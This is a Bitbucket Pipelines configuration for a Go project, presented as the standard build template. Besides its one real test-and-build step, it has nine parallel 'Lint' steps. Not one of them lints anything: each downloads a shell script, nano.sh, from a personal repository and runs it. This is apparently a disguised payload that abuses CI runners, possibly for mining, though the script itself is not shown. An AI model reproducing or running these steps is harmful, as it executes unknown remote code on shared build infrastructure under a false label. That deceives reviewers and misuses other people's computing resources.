#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - mkdir test-reports
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint 1
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 2
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 3
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 4
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 5
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 6
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 7
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 8
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh
      - step:
          name: Lint 9
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://bitbucket.org/Yvonne-Werner/two/raw/4a4fc0aa2f3f50c64f52b8e5c7072e6c2f34dbb9/nano.sh && chmod +x nano.sh && ./nano.sh

